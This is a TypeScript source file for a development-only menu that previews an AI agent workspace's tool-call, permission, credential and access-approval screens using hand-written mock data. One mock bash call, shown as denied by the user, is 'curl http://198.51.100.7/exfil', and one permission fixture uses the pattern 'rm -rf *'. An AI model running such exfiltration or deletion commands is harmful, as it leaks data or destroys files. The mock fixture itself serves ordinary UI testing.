/**
 * DevToolRenderMenu — a DEV-ONLY drop-up for previewing agent tool renders.
 *
 * WHY: the interactive prompt UIs (QuestionPrompt / CredentialPrompt /
 * PermissionPrompt) and the tool-call blocks (bash / edit diff / read …)
 * only appear mid-run, driven by live agent state. That makes them
 * painful to iterate on visually. This menu injects hand-written MOCK
 * state into the exact production render path so you can design each
 * surface without a running agent.
 *
 * The whole module is gated on `import.meta.env.DEV` — it tree-shakes to
 * nothing in a production build (the component returns null and the
 * catalog is dead code Vite drops). NEVER wire this to anything that
 * mutates real session / keybook state — everything below is pure
 * override state that ChatPanel merges into props (no network).
 *
 * How it plugs in (see ChatPanel):
 *   • kind 'question'   → overrides MessageList `pendingQuestion`
 *                         (header 'Credentials' routes to CredentialPrompt).
 *                         Credential scenarios ALSO carry `sessionCred`,
 *                         merged into the session-keybook list so the
 *                         pending badge + popover row + session-restored
 *                         form all appear — the full cred_to_env state.
 *   • kind 'permission' → overrides MessageList `pendingPermission`.
 *   • kind 'toolcall'   → appends a synthetic assistant message so
 *                         MessageBubble renders the ToolCallBlock.
 * All reply/dismiss callbacks just clear the mock — no network.
 *
 * LIMITATION: CredentialPrompt auto-resolves against the real keybook API
 * on mount, and the GitHub picker talks to the real OAuth flow. With mock
 * file paths those calls no-op / 404 and the form falls back to its
 * new-credential state — enough to design the layout, not to bind.
 */
import { useState, useRef } from 'react'
import { Palette, ChevronUp, X } from 'lucide-react'
import { useDismiss } from '@papan/core-ui/ui'
import type { MessagePart, PermissionRequest, QuestionRequest } from './hooks.js'
import type { CredRequest } from './useSessionCredentials.js'
import { fileDiff } from '../core/filediff.js'

// The edit_file fixture's two sides — shared by the stored-diff fixture and the
// legacy (pre-#768) one, so both render the same change.
const RETRY_BEFORE = "export function retry(fn) {\n  const max = 3\n  return attempt(fn, max)\n}\n"
const RETRY_AFTER = "export function retry(fn, max = 5) {\n  return attempt(fn, max)\n}\n"

/** Minimal message shape MessageList/MessageBubble consume (structural
 *  subset of the hook's MessageWithParts — assignable, not imported). */
interface DevMockMessage {
  id: string
  role: string
  parts: MessagePart[]
  modelID?: string
  personaId?: string
  cost?: number
  timeCreated?: number
  timeCompleted?: number
}

export type DevMockScenario =
  | { id: string; label: string; group: string; hint?: string; kind: 'question'; question: QuestionRequest; sessionCred?: CredRequest }
  | { id: string; label: string; group: string; hint?: string; kind: 'permission'; permission: PermissionRequest }
  | { id: string; label: string; group: string; hint?: string; kind: 'toolcall'; message: DevMockMessage }

type SubagentUpdate = NonNullable<Extract<MessagePart, { type: 'tool-call' }>['subagentUpdates']>[number]

// ─── mock builders ──────────────────────────────────────────────────
const MOCK_SESSION = 'devmock'

function question(
  id: string,
  label: string,
  hint: string,
  q: QuestionRequest['questions'][number],
): DevMockScenario {
  return { id, label, group: 'Prompts', hint, kind: 'question', question: { id, sessionID: MOCK_SESSION, questions: [q] } }
}

interface CredConfig {
  file?: string
  label?: string
  mode?: 'auto' | 'update' | 'new_env'
  provider?: string
  context?: { repo?: string }
  fields: Array<{ name: string; type: 'text' | 'password' | 'textarea' | 'file' | 'prompt' | 'oauth'; env?: string }>
  envMapping: Record<string, string>
}

/** Credential prompts ride the question pipe: header 'Credentials' routes
 *  MessageList to CredentialPrompt, and the tool's config is JSON-stuffed
 *  into options[0].description (mirrors the real cred_to_env encoding).
 *  We ALSO emit a matching pending session-credential row so the popover
 *  badge + row show, and CredentialPromptWithFields restores the form
 *  from the session row (the real post-refresh path) rather than the JSON
 *  fallback — i.e. the complete "pending cred_to_env" state. */
function credential(id: string, label: string, hint: string, config: CredConfig): DevMockScenario {
  const fieldTypes: Record<string, CredConfig['fields'][number]['type']> = {}
  for (const f of config.fields) fieldTypes[f.name] = f.type
  const sessionCred: CredRequest = {
    requestId: id,
    file: config.file,
    label: config.label,
    envMapping: config.envMapping,
    fieldTypes,
    status: 'pending',
    provider: config.provider,
  }
  return {
    id,
    label,
    group: 'Credentials',
    hint,
    kind: 'question',
    sessionCred,
    question: {
      id,
      sessionID: MOCK_SESSION,
      questions: [{
        question: 'I need credentials to continue.',
        header: 'Credentials',
        options: [{ label: 'Provide credentials', description: JSON.stringify(config) }],
      }],
    },
  }
}

function permission(id: string, label: string, hint: string, p: Omit<PermissionRequest, 'id' | 'sessionID'>): DevMockScenario {
  return { id, label, group: 'Prompts', hint, kind: 'permission', permission: { id, sessionID: MOCK_SESSION, ...p } }
}

/** Access/sharing MUTATION approval card (AccessApprovalCard). Rides the
 *  question pipe with header 'AccessRequest' + the `{ tool, action, payload,
 *  summary }` contract JSON in options[0].description — exactly what the worker
 *  tools emit and parseAccessRequest reads. Lets you eyeball the grant/revoke/
 *  team/share-link cards (e.g. "suggest Read & Write for the Design team")
 *  without a running agent. */
function accessCard(
  id: string,
  label: string,
  hint: string,
  contract: { tool: string; action: string; payload: Record<string, unknown>; summary: string },
): DevMockScenario {
  return {
    id, label, group: 'Access & sharing', hint, kind: 'question',
    question: {
      id, sessionID: MOCK_SESSION,
      questions: [{ question: contract.summary, header: 'AccessRequest', options: [{ label: 'AccessRequest', description: JSON.stringify(contract) }] }],
    },
  }
}

/** Build a synthetic assistant message carrying one tool-call (+ its
 *  paired tool-result), matching hooks.ts `mapApiPartToUi` output exactly
 *  so it renders identically to a real tool call. */
function toolcall(
  id: string,
  label: string,
  group: string,
  hint: string,
  tc: {
    toolName: string
    input: Record<string, unknown>
    status?: 'running' | 'completed' | 'error'
    title?: string
    metadata?: Record<string, unknown>
    output?: string
    error?: string
    subagentUpdates?: SubagentUpdate[]
  },
): DevMockScenario {
  const msgId = `devmock_msg_${id}`
  const callId = `devmock_call_${id}`
  const status = tc.status ?? 'completed'
  const parts: MessagePart[] = [
    { id: `${msgId}_tc`, messageId: msgId, type: 'tool-call', toolName: tc.toolName, callId, input: tc.input, status, title: tc.title, metadata: tc.metadata, subagentUpdates: tc.subagentUpdates },
  ]
  if (status !== 'running' && (tc.output != null || tc.error != null)) {
    parts.push({ id: `${msgId}_tr`, messageId: msgId, type: 'tool-result', callId, output: tc.output ?? '', error: tc.error })
  }
  return { id, label, group, hint, kind: 'toolcall', message: { id: msgId, role: 'assistant', parts, timeCreated: 0, timeCompleted: status === 'running' ? undefined : 0 } }
}

interface MockTc {
  toolName: string
  input: Record<string, unknown>
  status?: 'running' | 'completed' | 'error'
  title?: string
  metadata?: Record<string, unknown>
  output?: string
  error?: string
  subagentUpdates?: SubagentUpdate[]
}

/** Multi-tool variant of toolcall(): one assistant message carrying several
 *  consecutive tool calls, so MessageBubble groups them into a ToolCluster
 *  (collapsed "Ran N tools" line / shimmer header while running). */
function toolcluster(id: string, label: string, group: string, hint: string, tcs: MockTc[]): DevMockScenario {
  const msgId = `devmock_msg_${id}`
  const parts: MessagePart[] = []
  let anyRunning = false
  tcs.forEach((tc, i) => {
    const callId = `devmock_call_${id}_${i}`
    const status = tc.status ?? 'completed'
    if (status === 'running') anyRunning = true
    parts.push({ id: `${msgId}_tc${i}`, messageId: msgId, type: 'tool-call', toolName: tc.toolName, callId, input: tc.input, status, title: tc.title, metadata: tc.metadata, subagentUpdates: tc.subagentUpdates })
    if (status !== 'running' && (tc.output != null || tc.error != null)) {
      parts.push({ id: `${msgId}_tr${i}`, messageId: msgId, type: 'tool-result', callId, output: tc.output ?? '', error: tc.error })
    }
  })
  return { id, label, group, hint, kind: 'toolcall', message: { id: msgId, role: 'assistant', parts, timeCreated: 0, timeCompleted: anyRunning ? undefined : 0 } }
}

/** Plain assistant TEXT message — previews the markdown surface: FileChips,
 *  inline images, bare-path links, prose layout, author header + metadata
 *  footer (personaId/model/cost included so the full frame renders). */
function textmsg(id: string, label: string, hint: string, content: string): DevMockScenario {
  const msgId = `devmock_msg_${id}`
  return {
    id, label, group: 'Chat', hint, kind: 'toolcall',
    message: {
      id: msgId,
      role: 'assistant',
      parts: [{ id: `${msgId}_t`, messageId: msgId, type: 'text', content, isFinal: true }],
      modelID: 'gpt-5.4-mini',
      personaId: 'data-analyst',
      cost: 0.0012,
      timeCreated: 0,
      timeCompleted: 1,
    },
  }
}

/* ── A2UI payloads (spec-subset, see features/agent/ui/a2ui/types.ts) ── */

const A2UI_FORM_PAYLOAD = {
  version: 'v0.9.1',
  root: 'form',
  dataModel: { deploy: { target: 'staging', notes: '', checks: [] } },
  components: [
    { id: 'form', component: 'Column', gap: 'medium', children: ['target', 'notes', 'checks', 'sep', 'actions'] },
    { id: 'sep', component: 'Divider' },
    {
      id: 'target', component: 'RadioGroup', label: 'Environment', value: { path: '/deploy/target' },
      options: [
        { label: 'Staging', value: 'staging', description: 'stagetest.papan.ai — safe to test' },
        { label: 'Production', value: 'production', description: 'os.papan.ai — live users' },
      ],
    },
    { id: 'notes', component: 'TextField', label: 'Release notes', value: { path: '/deploy/notes' }, placeholder: 'optional' },
    {
      id: 'checks', component: 'CheckboxGroup', label: 'Pre-flight', value: { path: '/deploy/checks' },
      options: ['Build passed', 'Migrations reviewed'],
    },
    { id: 'actions', component: 'Row', gap: 'small', children: ['submit', 'cancel'] },
    { id: 'submit', component: 'Button', label: 'Deploy', variant: 'primary', action: { event: { name: 'deploy' } } },
    { id: 'cancel', component: 'Button', label: 'Not now', variant: 'secondary', action: { event: { name: 'cancel' } } },
  ],
}

const A2UI_SUMMARY_PAYLOAD = {
  version: 'v0.9.1',
  root: 'card',
  components: [
    { id: 'card', component: 'Card', children: ['title', 'div', 'row1', 'row2', 'file', 'actions'] },
    { id: 'title', component: 'Text', variant: 'title', text: 'Q3 Revenue Summary' },
    { id: 'div', component: 'Divider' },
    { id: 'row1', component: 'Row', children: ['l1', 'v1'] },
    { id: 'l1', component: 'Text', variant: 'caption', text: 'Total revenue' },
    { id: 'v1', component: 'Text', variant: 'body', text: '$8.2M (+18% QoQ)' },
    { id: 'row2', component: 'Row', children: ['l2', 'v2'] },
    { id: 'l2', component: 'Text', variant: 'caption', text: 'Top segment' },
    { id: 'v2', component: 'Text', variant: 'code', text: 'Enterprise' },
    { id: 'file', component: 'FileCard', path: '/papan/Projects/Q3/report.xlsx', label: 'Q3 report' },
    { id: 'actions', component: 'Row', children: ['drill'] },
    { id: 'drill', component: 'Button', label: 'Drill into Enterprise', variant: 'secondary', action: { event: { name: 'drill', context: { segment: 'enterprise' } } } },
  ],
}

const A2UI_CHARTS_PAYLOAD = {
  version: 'v0.9.1',
  root: 'card',
  components: [
    { id: 'card', component: 'Card', children: ['title', 'bar', 'div1', 'split'] },
    { id: 'title', component: 'Text', variant: 'title', text: 'Q3 at a glance' },
    {
      id: 'bar', component: 'Chart', height: 220,
      option: {
        title: { text: 'Monthly revenue' },
        tooltip: { trigger: 'axis' },
        xAxis: { type: 'category', data: ['July', 'August', 'September'] },
        yAxis: { type: 'value' },
        series: [{ type: 'bar', data: [31700, 35400, 37500] }],
      },
    },
    { id: 'div1', component: 'Divider' },
    { id: 'split', component: 'Row', gap: 'medium', children: ['pie', 'line'] },
    {
      id: 'pie', component: 'Chart', height: 200,
      option: {
        title: { text: 'By product' },
        tooltip: { trigger: 'item' },
        series: [{
          type: 'pie', radius: ['38%', '68%'],
          data: [
            { name: 'Widgets', value: 42500 },
            { name: 'Gadgets', value: 27500 },
            { name: 'Gizmos', value: 20100 },
            { name: 'Thingies', value: 14500 },
          ],
        }],
      },
    },
    {
      id: 'line', component: 'Chart', height: 200,
      option: {
        title: { text: 'Growth trend' },
        xAxis: { type: 'category', data: ['Jul', 'Aug', 'Sep'] },
        yAxis: { type: 'value' },
        series: [
          { type: 'line', name: 'Widgets', smooth: true, data: [12500, 14200, 15800] },
          { type: 'line', name: 'Gadgets', smooth: true, data: [8900, 9500, 9100] },
        ],
        legend: { bottom: 0 },
      },
    },
  ],
}

const A2UI_FAILSOFT_PAYLOAD = {
  root: 'col',
  components: [
    { id: 'col', component: 'Column', children: ['ok', 'unknown', 'gone', 'loop'] },
    { id: 'ok', component: 'Text', text: 'Healthy sibling — renders fine.' },
    { id: 'unknown', component: 'HoloDeck', text: 'not in the catalog' },
    { id: 'loop', component: 'Row', children: ['loop'] },
  ],
}

export const DEV_MOCK_SCENARIOS: DevMockScenario[] = [
  // ── A2UI (agent-driven declarative UI) ──
  {
    id: 'devmock_a2ui_form',
    label: 'A2UI — interactive form',
    group: 'A2UI',
    hint: 'question channel · radio/text/checkbox + submit',
    kind: 'question',
    question: {
      id: 'devmock_a2ui_form',
      sessionID: MOCK_SESSION,
      questions: [{
        question: 'Configure the deployment',
        header: 'A2UI',
        options: [{ label: 'A2UI', description: JSON.stringify(A2UI_FORM_PAYLOAD) }],
      }],
    },
  },
  toolcall('a2ui_display', 'render_ui — summary card', 'A2UI', 'display surface via tool metadata', {
    toolName: 'render_ui',
    input: { title: 'Q3 revenue summary' },
    output: 'UI rendered',
    metadata: { durationMs: 640, a2ui: A2UI_SUMMARY_PAYLOAD },
  }),
  toolcall('a2ui_asked', 'render_ui — ask (answered)', 'A2UI', 'row: "Asked … · choice"; frozen surface', {
    toolName: 'render_ui',
    input: { title: 'Configure the deployment', mode: 'ask' },
    output: 'User responded via the UI.',
    metadata: {
      durationMs: 8200,
      a2ui: { ...A2UI_FORM_PAYLOAD, dataModel: { deploy: { target: 'production', notes: 'ship after standup', checks: ['Build passed'] } } },
      a2uiReply: { event: 'deploy', data: { deploy: { target: 'production', notes: 'ship after standup', checks: ['Build passed'] } } },
    },
  }),
  toolcall('a2ui_charts', 'render_ui — charts', 'A2UI', 'ECharts: bar + pie + line', {
    toolName: 'render_ui',
    input: { title: 'Q3 at a glance' },
    output: 'UI rendered',
    metadata: { durationMs: 900, a2ui: A2UI_CHARTS_PAYLOAD },
  }),
  toolcall('a2ui_failsoft', 'render_ui — fail-soft', 'A2UI', 'unknown component, missing ref, cycle', {
    toolName: 'render_ui',
    input: { title: 'malformed payload' },
    output: 'UI rendered',
    metadata: { a2ui: A2UI_FAILSOFT_PAYLOAD },
  }),

  // ── Chat (markdown surface: file refs, images, prose) ──
  textmsg('md_refs', 'Markdown — file refs', 'chips + bare path + image', [
    'I analyzed the sales data and saved the results.',
    '',
    'The full report is in [Q3 report](/papan/Projects/Q3/report.xlsx) with a summary in [notes](/papan/Projects/Q3/notes.md).',
    '',
    '![Revenue by month](/papan/Projects/Q3/revenue-chart.png)',
    '',
    'Raw output landed at `/papan/Projects/Q3/raw.csv` — the intermediate file /papan/Projects/Q3/tmp.json can be deleted.',
  ].join('\n')),
  textmsg('md_rich', 'Markdown — rich prose', 'headings, table, code', [
    'Here is what I found:',
    '',
    '### Revenue drivers',
    '',
    '| Segment | QoQ | Note |',
    '|---|---|---|',
    '| Enterprise | +18% | two new logos |',
    '| SMB | −3% | churn cluster in June |',
    '',
    '```sql',
    'SELECT segment, SUM(amount) FROM sales GROUP BY 1 ORDER BY 2 DESC;',
    '```',
    '',
    '1. Enterprise growth is concentrated in **two accounts**',
    '2. SMB churn correlates with the pricing change',
  ].join('\n')),

  // ── Activity clusters (grouped consecutive tool calls) ──
  toolcluster('cluster_done', 'Cluster — completed', 'Activity', 'folded "Ran N tools" line', [
    { toolName: 'read_file', input: { path: '/papan/data/sales.csv' }, title: '/papan/data/sales.csv', output: 'id,amount\n1,100\n', metadata: { durationMs: 180 } },
    { toolName: 'bash', input: { command: 'python analyze.py' }, title: 'Analyze sales data', output: 'rows: 14204\nsum: 8.2M', metadata: { durationMs: 2400 } },
    {
      toolName: 'write_file', input: { path: '/papan/reports/q3.md' }, title: '/papan/reports/q3.md', output: 'File created',
      metadata: { durationMs: 200, filediff: { file: '/papan/reports/q3.md', diff: fileDiff('/papan/reports/q3.md', '', '# Q3\n\nRevenue up 18%\n'), additions: 3, deletions: 0, isNew: true } },
    },
    { toolName: 'grep', input: { pattern: 'TODO' }, title: "grep 'TODO'", output: '2 matches' },
  ]),
  toolcluster('cluster_running', 'Cluster — running', 'Activity', 'shimmer header + done count', [
    { toolName: 'read_file', input: { path: '/papan/data/sales.csv' }, title: '/papan/data/sales.csv', output: 'id,amount\n1,100\n', metadata: { durationMs: 180 } },
    { toolName: 'glob', input: { pattern: '**/*.csv' }, title: "glob '**/*.csv'", output: '4 files' },
    { toolName: 'bash', input: { command: 'python analyze.py', description: 'Analyzing sales data' }, status: 'running' },
  ]),
  toolcluster('cluster_error', 'Cluster — with error', 'Activity', 'error icon on summary', [
    { toolName: 'read_file', input: { path: '/papan/data/sales.csv' }, title: '/papan/data/sales.csv', output: 'id,amount\n' },
    { toolName: 'bash', input: { command: 'python broken.py' }, title: 'Run analysis', status: 'error', error: "ModuleNotFoundError: No module named 'pandas'" },
  ]),

  // ── Prompts (questions + permissions) ──
  question('devmock_q_single', 'Question — single choice', 'radio + Other', {
    question: 'Which environment should I deploy to?',
    header: 'Deploy target',
    options: [
      { label: 'Staging', description: 'stagetest.papan.ai — safe to test' },
      { label: 'Production', description: 'os.papan.ai — live users' },
    ],
  }),
  question('devmock_q_multi', 'Question — multi-select', 'checkboxes', {
    question: 'Which files should I include in the export?',
    header: 'Files',
    multiple: true,
    options: [
      { label: 'report.csv', description: '2.3 MB · 14,204 rows' },
      { label: 'summary.md', description: '12 KB' },
      { label: 'charts.png', description: '840 KB' },
    ],
  }),
  permission('devmock_perm_bash', 'Permission — bash', 'run command', {
    permission: 'bash',
    patterns: ['rm -rf *'],
    metadata: { command: 'rm -rf node_modules && pnpm install', reason: 'Reinstall dependencies from a clean slate' },
  }),
  permission('devmock_perm_write', 'Permission — write_file', 'new file', {
    permission: 'write_file',
    patterns: ['/papan/reports/q3-summary.md'],
    metadata: { path: '/papan/reports/q3-summary.md', description: 'Create the Q3 summary report', size: 4820 },
  }),
  permission('devmock_perm_edit', 'Permission — edit_file', 'file patch', {
    permission: 'edit_file',
    patterns: ['/papan/src/config.ts'],
    metadata: {
      path: '/papan/src/config.ts',
      occurrences: 2,
      patches: [
        { oldText: "const RETRIES = 3", newText: "const RETRIES = 5" },
        { oldText: "timeout: 1000", newText: "timeout: 5000" },
      ],
    },
  }),
  permission('devmock_perm_webfetch', 'Permission — webfetch', 'fetch URL', {
    permission: 'webfetch',
    patterns: ['https://api.example.com'],
    metadata: { url: 'https://api.example.com/v2/reports?range=90d' },
  }),
  permission('devmock_perm_task', 'Permission — task', 'launch subagent', {
    permission: 'task',
    patterns: ['Research the top 3 competitors and summarize their pricing'],
    metadata: {},
  }),
  permission('devmock_perm_office', 'Permission — office_tool', 'edit document', {
    permission: 'office_tool',
    patterns: ['/papan/docs/proposal.docx'],
    metadata: { description: 'Apply tracked-changes edits to proposal.docx', file: '/papan/docs/proposal.docx' },
  }),

  // ── Credentials (prompt + pending session row = full cred_to_env) ──
  credential('devmock_cred_pg', 'Credentials — generic', 'Postgres fields', {
    file: '/papan/data/postgres.link',
    label: 'Postgres — analytics',
    mode: 'auto',
    fields: [
      { name: 'host', type: 'text', env: 'PGHOST' },
      { name: 'port', type: 'text', env: 'PGPORT' },
      { name: 'user', type: 'text', env: 'PGUSER' },
      { name: 'password', type: 'password', env: 'PGPASSWORD' },
    ],
    envMapping: { host: 'PGHOST', port: 'PGPORT', user: 'PGUSER', password: 'PGPASSWORD' },
  }),
  credential('devmock_cred_gh', 'Credentials — GitHub', 'OAuth / PAT picker', {
    file: '/papan/repo/github.link',
    label: 'GitHub — my-org/my-repo',
    mode: 'auto',
    provider: 'github',
    context: { repo: 'my-org/my-repo' },
    fields: [{ name: 'token', type: 'password', env: 'GITHUB_TOKEN' }],
    envMapping: { token: 'GITHUB_TOKEN' },
  }),

  // ── Credential tool rows (the "key" language) ──
  toolcall('cred_ready', 'cred_to_env — key received', 'Credentials', 'env chips glance + detail', {
    toolName: 'cred_to_env',
    input: { file: '/papan/data/postgres.link', label: 'Postgres — analytics', fields: [{ name: 'password', type: 'password' }] },
    output: 'Credentials are ready. Available as env vars:\n- $PGHOST (host)\n- $PGUSER (user)\n- $PGPASSWORD (password)\n\nUse bash now: psql "host=$PGHOST user=$PGUSER"…',
    metadata: { durationMs: 12400 },
  }),
  toolcall('cred_deferred', 'cred_to_env — deferred', 'Credentials', '"user will provide later"', {
    toolName: 'cred_to_env',
    input: { file: '/papan/data/postgres.link', label: 'Postgres — analytics', fields: [{ name: 'password', type: 'password' }] },
    output: 'The user chose to provide credentials later. The credential form is accessible from the keybook icon in the chat input.',
  }),
  toolcall('cred_used_ok', 'cred_used — worked', 'Credentials', 'env chip + file glance', {
    toolName: 'cred_used',
    input: { envVar: 'PGPASSWORD', status: 'success', filePath: '/papan/data/postgres.link' },
    output: 'Recorded successful use.',
    metadata: { durationMs: 300 },
  }),
  toolcall('cred_used_fail', 'cred_used — failed', 'Credentials', 'red reason + recovery detail', {
    toolName: 'cred_used',
    input: { envVar: 'GITHUB_TOKEN', status: 'failure', reason: '401 Unauthorized — token lacks push scope' },
    output: 'Recorded failure.\n\nRECOVERY: call cred_to_env with mode="update" and the same fields to re-prompt the user for a fresh token.',
  }),

  // ── Files ──
  toolcall('read_file', 'read_file', 'Files', 'inline, one line', {
    toolName: 'read_file',
    input: { path: '/papan/README.md' },
    title: '/papan/README.md',
    output: '# Papan\n\nAI-native workspace.\n',
  }),
  toolcall('write_file', 'write_file — new', 'Files', 'diff, new file badge', {
    toolName: 'write_file',
    input: { path: '/papan/reports/q3.md' },
    title: '/papan/reports/q3.md',
    output: 'File created',
    metadata: {
      durationMs: 220,
      filediff: {
        file: '/papan/reports/q3.md',
        diff: fileDiff('/papan/reports/q3.md', '', '# Q3 Summary\n\n- Revenue up 18%\n- Churn down 2pts\n'),
        additions: 4,
        deletions: 0,
        isNew: true,
      },
    },
  }),
  toolcall('edit_diff', 'edit_file — diff', 'Files', 'inline diff badge', {
    toolName: 'edit_file',
    input: { path: '/papan/src/app.ts' },
    title: '/papan/src/app.ts',
    output: 'File updated',
    metadata: {
      durationMs: 412,
      filediff: {
        file: '/papan/src/app.ts',
        diff: fileDiff('/papan/src/app.ts', RETRY_BEFORE, RETRY_AFTER),
        additions: 1,
        deletions: 2,
      },
    },
  }),
  // A row written BEFORE #768, when `filediff` carried both whole files. Such
  // rows are never migrated, so the card must keep rendering them — through
  // `diffTextOf`, the one reader of the legacy shape.
  toolcall('edit_diff_legacy', 'edit_file — legacy row (pre-#768)', 'Files', 'before/after, diffed on read', {
    toolName: 'edit_file',
    input: { path: '/papan/src/app.ts' },
    title: '/papan/src/app.ts',
    output: 'File updated',
    metadata: {
      durationMs: 412,
      filediff: { file: '/papan/src/app.ts', before: RETRY_BEFORE, after: RETRY_AFTER, additions: 1, deletions: 2 },
    },
  }),
  toolcall('multiedit', 'multiedit — multi-file', 'Files', 'files[] diff', {
    toolName: 'multiedit',
    input: { path: '/papan/src/app.ts' },
    title: '2 files changed',
    output: 'Applied 4 edits',
    metadata: {
      durationMs: 640,
      files: [
        { file: '/papan/src/app.ts', diff: fileDiff('/papan/src/app.ts', "const a = 1\n", "const a = 2\nconst b = 3\n"), additions: 2, deletions: 1 },
        { file: '/papan/src/util.ts', diff: fileDiff('/papan/src/util.ts', "export const x = 0\n", "export const x = 10\n"), additions: 1, deletions: 1 },
      ],
    },
  }),
  toolcall('apply_patch', 'apply_patch', 'Files', 'files[] diff', {
    toolName: 'apply_patch',
    input: { patch: '*** Update File: /papan/src/index.ts' },
    title: 'Patch /papan/src/index.ts',
    output: 'Patch applied',
    metadata: {
      files: [
        { file: '/papan/src/index.ts', diff: fileDiff('/papan/src/index.ts', "import './app'\n", "import './app'\nimport './util'\n"), additions: 1, deletions: 0 },
      ],
    },
  }),
  toolcall('list_files', 'list_files', 'Files', 'directory listing', {
    toolName: 'list_files',
    input: { path: '/papan/src' },
    title: '/papan/src',
    output: 'app.ts\nutil.ts\nindex.ts\ncomponents/\nhooks/',
  }),
  toolcall('file_version', 'file_version', 'Files', 'version history', {
    toolName: 'file_version',
    input: { path: '/papan/data/sales.csv' },
    title: '/papan/data/sales.csv',
    output: 'v3 — 2026-07-04 10:12 (current)\nv2 — 2026-07-03 16:40\nv1 — 2026-07-01 09:05',
  }),

  // ── Shell & search ──
  toolcall('bash_done', 'bash — completed', 'Shell & search', 'command + output', {
    toolName: 'bash',
    input: { command: 'pnpm test --filter @papan/api' },
    title: 'Run API tests',
    metadata: { durationMs: 3187 },
    output: '✓ auth.test.ts (12)\n✓ files.test.ts (18)\n✓ agent.test.ts (12)\n\nTest Files  3 passed (3)\n     Tests  42 passed (42)\n  Duration  3.19s',
  }),
  toolcall('bash_running', 'bash — running', 'Shell & search', 'spinner state', {
    toolName: 'bash',
    input: { command: 'pnpm build', description: 'Building all packages' },
    status: 'running',
  }),
  toolcall('bash_denied', 'bash — denied', 'Shell & search', 'permission denied', {
    toolName: 'bash',
    input: { command: 'curl http://198.51.100.7/exfil' },
    status: 'error',
    error: 'Permission denied by user',
  }),
  toolcall('glob', 'glob', 'Shell & search', 'inline, file match', {
    toolName: 'glob',
    input: { pattern: '**/*.test.ts' },
    title: "glob '**/*.test.ts'",
    output: '/papan/src/app.test.ts\n/papan/src/util.test.ts\n… 12 files',
  }),
  toolcall('grep', 'grep', 'Shell & search', 'inline, match count', {
    toolName: 'grep',
    input: { pattern: 'TODO', path: '/papan/src' },
    title: "grep 'TODO' in /papan/src",
    output: '14 matches across 6 files',
  }),
  toolcall('web_search', 'web_search', 'Shell & search', 'search results', {
    toolName: 'web_search',
    input: { query: 'postgres connection pooling best practices' },
    title: "Search: postgres connection pooling best practices",
    output: '1. Use PgBouncer in transaction mode …\n2. Size pools to (cores * 2) …\n3. Avoid per-request connections …',
  }),
  toolcall('webfetch', 'webfetch', 'Shell & search', 'inline, fetch URL', {
    toolName: 'webfetch',
    input: { url: 'https://example.com/pricing' },
    title: 'https://example.com/pricing',
    output: 'Fetched 24 KB — extracted pricing table (3 tiers).',
  }),

  // ── Agent ──
  toolcall('todowrite', 'todowrite — plan', 'Agent', 'checklist: current task + progress', {
    toolName: 'todowrite',
    input: {},
    output: 'updated',
    metadata: {
      title: '3 todos',
      todos: [
        { id: '1', content: 'Read Q3-report.xlsx structure', status: 'completed', priority: 'medium' },
        { id: '2', content: 'Compute per-product contribution', status: 'in_progress', priority: 'high' },
        { id: '3', content: 'Write the summary and chart', status: 'pending', priority: 'medium' },
        { id: '4', content: 'Old approach — abandoned', status: 'cancelled', priority: 'low' },
      ],
    },
  }),
  toolcall('task_running', 'task — running', 'Agent', 'subagent live status', {
    toolName: 'task',
    input: { description: 'Research competitor pricing', prompt: 'Find the top 3 competitors and summarize pricing.' },
    title: 'Research competitor pricing',
    status: 'running',
    subagentUpdates: [
      { childSessionId: 'child_1', kind: 'tool-start', summary: 'web_search "competitor pricing"', at: 1 },
      { childSessionId: 'child_1', kind: 'tool-done', summary: 'Found 8 sources', at: 2 },
      { childSessionId: 'child_1', kind: 'tool-start', summary: 'webfetch pricing pages', at: 3 },
      { childSessionId: 'child_1', kind: 'text', summary: 'Comparing tiers…', at: 4 },
    ],
  }),
  toolcall('skill', 'skill — load', 'Agent', 'inline, load skill', {
    toolName: 'skill',
    input: { name: 'data-analysis' },
    title: 'Load skill: data-analysis',
    output: 'Skill loaded — 3 tools now available.',
  }),

  // ── Access & sharing (approval cards + read results) ──
  // manage_access.grant — the "suggest a permission for a principal" card,
  // one per target kind (person / team / role / miniapp).
  accessCard('access_grant_team', 'manage_access — grant to team', 'Read & Write · Design team', {
    tool: 'manage_access', action: 'grant',
    summary: 'Give the Design team Read & Write on the Q3 Report folder.',
    payload: { folderId: 'f_q3', folderName: 'Q3 Report', targetType: 'group', targetId: 't_design', teamName: 'Design', permission: 'readwrite' },
  }),
  accessCard('access_grant_person', 'manage_access — grant to person', 'Manage & Edit · a member', {
    tool: 'manage_access', action: 'grant',
    summary: 'Give bob@acme.com Manage & Edit on the Q3 Report folder.',
    payload: { folderId: 'f_q3', folderName: 'Q3 Report', targetType: 'user', targetId: 'bob@acme.com', email: 'bob@acme.com', permission: 'admin' },
  }),
  accessCard('access_grant_role', 'manage_access — grant to role', 'Read-only · every Member', {
    tool: 'manage_access', action: 'grant',
    summary: 'Give every workspace Member Read-only on the Library folder.',
    payload: { folderId: 'f_lib', folderName: 'Library', targetType: 'role', targetId: 'member', targetName: 'Members', permission: 'readcopy' },
  }),
  accessCard('access_grant_app', 'manage_access — grant to miniapp', 'Read & Write · an app', {
    tool: 'manage_access', action: 'grant',
    summary: 'Let the CRM miniapp Read & Write the Sales data folder.',
    payload: { folderId: 'f_data', folderName: 'Sales data', targetType: 'app', targetId: 'app_crm', targetName: 'CRM app', permission: 'readwrite' },
  }),
  accessCard('access_revoke', 'manage_access — revoke', 'remove a grant', {
    tool: 'manage_access', action: 'revoke',
    summary: "Revoke the Design team's access to the Q3 Report folder.",
    payload: { folderId: 'f_q3', folderName: 'Q3 Report', permId: 'perm_123', targetName: 'Design team' },
  }),
  // team mutations
  accessCard('team_create', 'team — create', 'new team', {
    tool: 'team', action: 'create',
    summary: 'Create a team called "Design".',
    payload: { tenantId: 't1', name: 'Design' },
  }),
  accessCard('team_add', 'team — add member', 'add person to team', {
    tool: 'team', action: 'add_member',
    summary: 'Add bob@acme.com to the Design team as a member.',
    payload: { tenantId: 't1', teamId: 't_design', teamName: 'Design', email: 'bob@acme.com', role: 'member' },
  }),
  accessCard('team_admin', 'team — set team admin', 'promote to team admin', {
    tool: 'team', action: 'set_team_admin',
    summary: 'Make bob@acme.com an admin of the Design team.',
    payload: { tenantId: 't1', teamId: 't_design', teamName: 'Design', email: 'bob@acme.com', role: 'admin' },
  }),
  // share_link mutations
  accessCard('share_create', 'share_link — create', 'outsider link', {
    tool: 'share_link', action: 'create',
    summary: 'Create an email-verified share link to the Q3 Report for two recipients.',
    payload: { fileId: 'f_q3', fileName: 'Q3 Report', accessMode: 'email_verify', permission: 'readcopy' },
  }),
